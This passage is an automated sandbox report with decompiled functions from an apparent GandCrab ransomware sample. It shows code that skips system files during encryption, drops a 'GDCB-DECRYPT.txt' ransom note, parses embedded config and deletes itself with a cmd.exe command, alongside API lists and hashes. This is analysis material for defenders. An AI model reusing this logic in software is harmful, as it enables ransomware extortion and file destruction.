						_t15 = lstrcmpiW(_t26, L"GDCB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x00406249
0x0040624c
0x00406251
0x00406253
0x00406256
0x00406259
0x0040625a
0x00406260
0x00406260
0x00406263
0x00406264
0x00406260
0x00406274
0x00406281
0x00406296
0x00000000
0x004062e0
0x004062e6
0x004062eb
0x004062f0
0x004062f0
0x00406285
0x00406285
0x0040628b
0x0040628b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,00406403), ref: 0040624C
lstrlenW.KERNEL32(00000000), ref: 00406251
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0040627D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 00406292
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0040629E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 004062AA
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 004062B6
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 004062C2
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 004062CE
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 004062DA
lstrcmpiW.KERNEL32(-00000004,GDCB-DECRYPT.txt), ref: 004062E6

Strings

boot.ini, xrefs: 004062BC
ntuser.dat, xrefs: 00406298
thumbs.db, xrefs: 004062D4
ntuser.dat.log, xrefs: 004062C8
autorun.inf, xrefs: 0040628C
GDCB-DECRYPT.txt, xrefs: 004062E0
desktop.ini, xrefs: 00406277
bootsect.bak, xrefs: 004062B0
iconcache.db, xrefs: 004062A4

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: GDCB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-634406045
Opcode ID: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
Instruction ID: 048d6f8e0bde4782f578bbb55f50fa0ba415c8db6f5f272e4d17ab509b81b6c5
Opcode Fuzzy Hash: 39cfe28d139bfd9c5cd1eab42733880a64dfed75e44f9506df37686ff5eafa02
Instruction Fuzzy Hash: 3D11546264262A2ADA6072799C05EEB129C4D91F5031603BBFC05F21C4DFFDDEA285BD

Uniqueness

Uniqueness Score: -1.00%

Function 00406110 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 109
memoryCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E00406110(void* __ecx) {
				void* _t9;
				intOrPtr* _t20;
				void* _t42;
				void* _t45;

				_t42 = __ecx;
				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E00407BA0(_t42, L"\\ProgramData\\") != 0 || E00407BA0(_t42, L"\\Program Files\\") != 0 || E00407BA0(_t42, L"\\Tor Browser\\") != 0 || E00407BA0(_t42, L"Ransomware") != 0 || E00407BA0(_t42, L"\\All Users\\") != 0) {
					L15:
					VirtualFree(_t45, 0, 0x8000);
					return 0;
				} else {
					_t9 = E00407BA0(_t42, L"\\Local Settings\\");
					if(_t9 != 0) {
						goto L15;
					} else {
						_t20 = __imp__SHGetSpecialFolderPathW;
						_push(_t9);
						_push(0x2a);
						_push(_t45);
						_push(_t9);
						if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t45);
							_push(0);
							if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
								_push(0);
								_push(0x24);
								_push(_t45);
								_push(0);
								if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t45);
									_push(0);
									if( *_t20() == 0 || E00407BA0(_t42, _t45) == 0) {
										VirtualFree(_t45, 0, 0x8000);
										return 1;
									} else {
										goto L15;
									}
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						} else {
							goto L15;
						}
					}
				}
			}

0x00406121
0x00406130
0x00406139
0x00406228
0x00406231
0x0040623c
0x0040618f
0x00406196
0x0040619d
0x00000000
0x004061a3
0x004061a3
0x004061a9
0x004061aa
0x004061ac
0x004061ad
0x004061b2
0x004061c1
0x004061c3
0x004061c5
0x004061c6
0x004061cc
0x004061db
0x004061dd
0x004061df
0x004061e0
0x004061e6
0x004061f5
0x004061f7
0x004061f9
0x004061fa
0x00406200
0x0040621c
0x00406227
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004061b2
0x0040619d

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,00406706,00000000,?,?), ref: 00406123
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,00406706,00000000,?,?), ref: 004061AE
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,00406706,00000000,?,?), ref: 004061C8
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,00406706,00000000,?,?), ref: 004061E2
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,00406706,00000000,?,?), ref: 004061FC
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 0040621C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00406706,00000000,?,?), ref: 00406231

Strings

\Tor Browser\, xrefs: 00406153
\Local Settings\, xrefs: 0040618F
Ransomware, xrefs: 00406167
\Program Files\, xrefs: 0040613F
\ProgramData\, xrefs: 00406129
\All Users\, xrefs: 0040617B

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
API String ID: 1363212851-106008693
Opcode ID: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
Instruction ID: f4f5e37f6e05bfd3754b73729b88660f17dd9cd9e6b304112d3c6a2927df81c1
Opcode Fuzzy Hash: 04a06f1e15ba69642b496c6929e789c3ce974156cbd8b3f19c2c8875e9bacd52
Instruction Fuzzy Hash: F4213D3078021233EA2031662D6AB7F299E8BD5749F55447BBA02FA3C5FEBCEC15425D

Uniqueness

Uniqueness Score: -1.00%

Function 00406BA0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00406BA0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x00406ba0
0x00406ba8
0x00406baa
0x00406bae
0x00406bb3
0x00406bc1
0x00406bc4
0x00406bc9
0x00406bc9
0x00406bcf
0x00406bd9
0x00406be0
0x00406be4
0x00406be7
0x00406be7
0x00406bed
0x00406bfb
0x00406bfd
0x00406c05
0x00406c08
0x00406c08
0x00406c0e
0x00406c1c
0x00406c1e
0x00406c26
0x00406c29
0x00406c29
0x00406c2f
0x00406c3d
0x00406c3f
0x00406c47
0x00406c4a
0x00406c4a
0x00406c50
0x00406c5e
0x00406c60
0x00406c68
0x00406c6b
0x00406c6b
0x00406c71
0x00406c7f
0x00406c81
0x00406c89
0x00406c8c
0x00406c8c
0x00406c92
0x00406ca0
0x00406ca2
0x00406caa
0x00406cad
0x00406cad
0x00406cb3
0x00406cb5
0x00406cb5
0x00406cbc
0x00406cca
0x00406ccc
0x00406cd4
0x00406cd7
0x00406cd7
0x00406ce0
0x00406d0c
0x00406ce2
0x00406ce8
0x00406d06
0x00406d06

APIs

lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BF2
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406BFD
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C13
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C1E
lstrlenW.KERNEL32(004048B6,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C34
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C3F
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C55
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C60
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C76
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C81
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406C97
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CA2
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CC1
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CCC
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CE8
lstrlenW.KERNEL32(?,?,?,?,00404599,00000000,?,00000000,00000000,?,00000000), ref: 00406CF6

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
Instruction ID: 0763c41813d47cec7f7f3bb87dd63c09dcdfaa37f7dde6f7b674e60aab311cac
Opcode Fuzzy Hash: b7784ce1624038f5bbd5c7dcf95e2abfdb0947caf69f15ff149bb7f942ea0507
Instruction Fuzzy Hash: BA412B32200611EFD7125FB8DE8C796BBB2FF04315F094539E416A2A62D775AC78DB88

Uniqueness

Uniqueness Score: -1.00%

Function 00405270 Relevance: 18.1, APIs: 12, Instructions: 92
filestringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405270(WCHAR* __ecx) {
				CHAR* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _t22;
				void* _t24;
				signed int _t26;
				int _t30;
				char _t32;
				void* _t33;
				signed char _t34;
				CHAR* _t36;
				WCHAR* _t37;
				WCHAR* _t38;
				void* _t39;
				CHAR* _t40;

				_t37 = __ecx;
				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
				_v20 = _t39;
				GetModuleFileNameW(0, _t39, 0x200);
				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
				_v16 = _t33;
				if(_t33 != 0xffffffff) {
					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
					_v24 = _t22;
					if(_t22 != 0) {
						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
						_v12 = _t24;
						if(_t24 != 0) {
							_t5 = _t24 + 0x4e; // 0x4e
							_t40 = _t5;
							_v8 = _t40;
							_t26 = lstrlenW(_t37);
							_t34 = 0;
							_t38 =  &(_t37[_t26]);
							if(lstrlenA(_t40) + _t27 != 0) {
								_t36 = _t40;
								do {
									if((_t34 & 0x00000001) != 0) {
										 *((char*)(_t38 + _t34)) = 0;
									} else {
										_t32 =  *_t40;
										_t40 =  &(_t40[1]);
										 *((char*)(_t38 + _t34)) = _t32;
									}
									_t34 = _t34 + 1;
									_t30 = lstrlenA(_t36);
									_t36 = _v8;
								} while (_t34 < _t30 + _t30);
							}
							UnmapViewOfFile(_v12);
							_t33 = _v16;
							_t39 = _v20;
						}
						CloseHandle(_v24);
					}
					CloseHandle(_t33);
				}
				return VirtualFree(_t39, 0, 0x8000);
			}

0x00405287
0x0040528f
0x00405299
0x0040529c
0x004052bb
0x004052bd
0x004052c3
0x004052d4
0x004052da
0x004052df
0x004052ea
0x004052f0
0x004052f5
0x004052f7
0x004052f7
0x004052fb
0x004052fe
0x00405305
0x00405307
0x00405312
0x00405314
0x00405316
0x00405319
0x00405323
0x0040531b
0x0040531b
0x0040531d
0x0040531e
0x0040531e
0x00405328
0x00405329
0x0040532f
0x00405334
0x00405316
0x0040533b
0x00405341
0x00405344
0x00405344
0x0040534a
0x0040534a
0x00405351
0x00405351
0x0040536b

APIs

VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,00405482), ref: 00405289
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,00405482), ref: 0040529C
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00405482), ref: 004052B5
CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052D4
MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00405482), ref: 004052EA
lstrlenW.KERNEL32(?,?,?,?,?,00405482), ref: 004052FE
lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 0040530A
lstrlenA.KERNEL32(0000004E,?,?,?,?,00405482), ref: 00405329
UnmapViewOfFile.KERNEL32(?,?,?,?,?,00405482), ref: 0040533B
CloseHandle.KERNEL32(?,?,?,?,?,00405482), ref: 0040534A
CloseHandle.KERNEL32(00000000,?,?,?,?,00405482), ref: 00405351
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,00405482), ref: 0040535F

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
String ID:
API String ID: 869890170-0
Opcode ID: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
Instruction ID: 2f98b26bd8e2ee7d85d2e29faddfdf40e9a873387be652c4beaa2a3b1dd5d715
Opcode Fuzzy Hash: 8d8f66e7a3aa33aaa14d7d124576a6fa184a176826b3374fbd9b00ab5f319adc
Instruction Fuzzy Hash: 4231A531740715BBEB205B649D4EF5E7B68EB05B40F200075FB41BA2D2C6F5A9018FAC

Uniqueness

Uniqueness Score: -1.00%

Function 00406640 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 59
filememorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406640(void* __ecx) {
				long _v8;
				WCHAR* _t7;
				signed int _t16;
				void* _t21;
				void* _t22;
				void* _t25;

				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
				if(_t22 != 0xffffffff) {
					_t7 =  *0x412b04; // 0x412000
					if(_t7 != 0) {
						WriteFile(_t22,  *0x412b04, lstrlenW(_t7) + _t11,  &_v8, 0);
					}
					CloseHandle(_t22);
					_t16 = 1;
				} else {
					_t16 = 0 | GetLastError() == 0x000000b7;
				}
				VirtualFree(_t25, 0, 0x8000);
				return _t16;
			}

0x0040665b
0x00406663
0x00406685
0x0040668a
0x0040669e
0x004066a5
0x004066be
0x004066be
0x004066c5
0x004066cb
0x0040668c
0x00406699
0x00406699
0x004066d8
0x004066e6

APIs

VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,00406722,00000000,?,?), ref: 00406655
wsprintfW.USER32 ref: 00406663
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0040667F
GetLastError.KERNEL32(?,?), ref: 0040668C
lstrlenW.KERNEL32(00412000,?,00000000,?,?), ref: 004066AE
WriteFile.KERNEL32(00000000,00000000,?,?), ref: 004066BE
CloseHandle.KERNEL32(00000000,?,?), ref: 004066C5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 004066D8

Strings

%s\GDCB-DECRYPT.txt, xrefs: 0040665D

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
String ID: %s\GDCB-DECRYPT.txt
API String ID: 2985722263-4054134092
Opcode ID: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
Instruction ID: 9b1f1ee7684b205ce34ce946b48542e85b02e5c2206a3fbb18e6830c08f85e02
Opcode Fuzzy Hash: bc3a2ebfe9eeb877b40095771c2eb21f56d946499f613914195d7b6821dfde9f
Instruction Fuzzy Hash: 2D0171753802107BF7205B64AE4EFAA3A6CEB49B15F100135FB05F91E1DBF96C11866D

Uniqueness

Uniqueness Score: -1.00%

Function 00404FD0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404FD0() {
				WCHAR* _t6;
				short* _t8;

				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
				if(_t6 != 0) {
					GetModuleFileNameW(0, _t6, 0x200);
					if(_t8 != 0) {
						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
					}
				}
				ExitProcess(0);
			}

0x00404ff6
0x00404ffa
0x00404ffe
0x00405008
0x00405010
0x00405019
0x00405033
0x00405033
0x00405010
0x0040503b

APIs

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,?,0040526B,00000000), ref: 00404FE6
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00404FF8
GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 00405008
wsprintfW.USER32 ref: 00405019
ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00405033
ExitProcess.KERNEL32 ref: 0040503B

Strings

open, xrefs: 0040502C
/c timeout -c 5 & del "%s" /f /q, xrefs: 00405013
cmd.exe, xrefs: 00405027

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
API String ID: 4033023619-516011104
Opcode ID: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
Instruction ID: 72ce1eeed403cc9d60347bc981b2010fd1fdc34af71b64a0c2a2ed5fbb2db01d
Opcode Fuzzy Hash: e6b0716a671a28e0b9e882897ebb5d15568001f9354c485655236bd259232091
Instruction Fuzzy Hash: E2F0C971BC572277F2351B655D0FF4B2D689B85F56F250036BB087E2D28AF468008AED

Uniqueness

Uniqueness Score: -1.00%

Function 00403200 Relevance: 13.6, APIs: 7, Strings: 2, Instructions: 73
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403200(void* __ecx, char _a4, intOrPtr _a8) {
				char _t5;
				char _t6;
				intOrPtr _t8;
				int _t10;
				CHAR* _t13;
				int _t15;
				void* _t18;
				CHAR* _t21;
				CHAR* _t23;

				_t1 =  &_a4; // 0x405135
				_t23 =  *_t1;
				_t18 = __ecx;
				_t5 =  *_t23;
				if(_t5 == 0) {
					L4:
					_t6 =  *_t23;
					if(_t6 == 0x7d) {
						goto L10;
					} else {
						_t21 = _t23;
						if(_t6 != 0) {
							while( *_t21 != 0x7d) {
								_t21 =  &(_t21[1]);
								if( *_t21 != 0) {
									continue;
								} else {
								}
								goto L12;
							}
							 *_t21 = 0;
						}
						L12:
						_t8 = _a8;
						if(_t8 != 1) {
							if(_t8 == 2) {
								_t10 = lstrlenA(_t23);
								_t13 = HeapAlloc(GetProcessHeap(), 8, _t10 + 1);
								 *(_t18 + 8) = _t13;
								goto L16;
							}
						} else {
							_t15 = lstrlenA(_t23);
							_t13 = HeapAlloc(GetProcessHeap(), 8, _t15 + 1);
							 *(_t18 + 4) = _t13;
							L16:
							if(_t13 != 0) {
								lstrcpyA(_t13, _t23);
							}
						}
						 *_t21 = 0x7d;
						return 1;
					}
				} else {
					while(_t5 != 0x7d) {
						_t23 =  &(_t23[1]);
						if(_t5 == 0x3d) {
							goto L4;
						} else {
							_t5 =  *_t23;
							if(_t5 != 0) {
								continue;
							} else {
								goto L4;
							}
						}
						goto L19;
					}
					L10:
					return 0;
				}
				L19:
			}

0x00403205
0x00403205
0x00403208
0x0040320a
0x0040320e
0x0040321f
0x0040321f
0x00403223
0x00000000
0x00403225
0x00403226
0x0040322a
0x00403230
0x00403235
0x00403239
0x00000000
0x00000000
0x0040323b
0x00000000
0x00403239
0x00403245
0x00403245
0x00403248
0x00403248
0x0040324e
0x00403270
0x00403273
0x00403284
0x0040328a
0x00000000
0x0040328a
0x00403250
0x00403251
0x00403262
0x00403268
0x0040328d
0x0040328f
0x00403293
0x00403293
0x0040328f
0x00403299
0x004032a5
0x004032a5
0x00403210
0x00403210
0x00403214
0x00403217
0x00000000
0x00403219
0x00403219
0x0040321d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040321d
0x00000000
0x00403217
0x0040323e
0x00403242
0x00403242
0x00000000

APIs

lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403251
GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040325B
HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403262
lstrlenA.KERNEL32(5Q@,00000000,?,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403273
GetProcessHeap.KERNEL32(00000008,00000001,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 0040327D
HeapAlloc.KERNEL32(00000000,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403284
lstrcpyA.KERNEL32(00000000,5Q@,?,004034BF,5Q@,00000001,5Q@,00000000,?,74CB66A0,?,?,00405135,00000000), ref: 00403293

Strings

5Q@, xrefs: 00403205, 00403250, 00403272, 00403291
5Q@, xrefs: 00403203

Memory Dump Source

Source File: 00000001.00000002.561857289.0000000000402000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.561847780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561896409.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561907295.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.561999886.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9gkAKTWOXp.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrlen$lstrcpy
String ID: 5Q@$5Q@
API String ID: 511007297-547021831
Opcode ID: b788b534275cfb914030b1c27688c49dd11fa4b54458ea966c16f7cdcb022cd9
Instruction ID: bda05b356578e7771a31f68481e16acc2b94da25dd7eb2ac23c0ab8e8a28fe1a
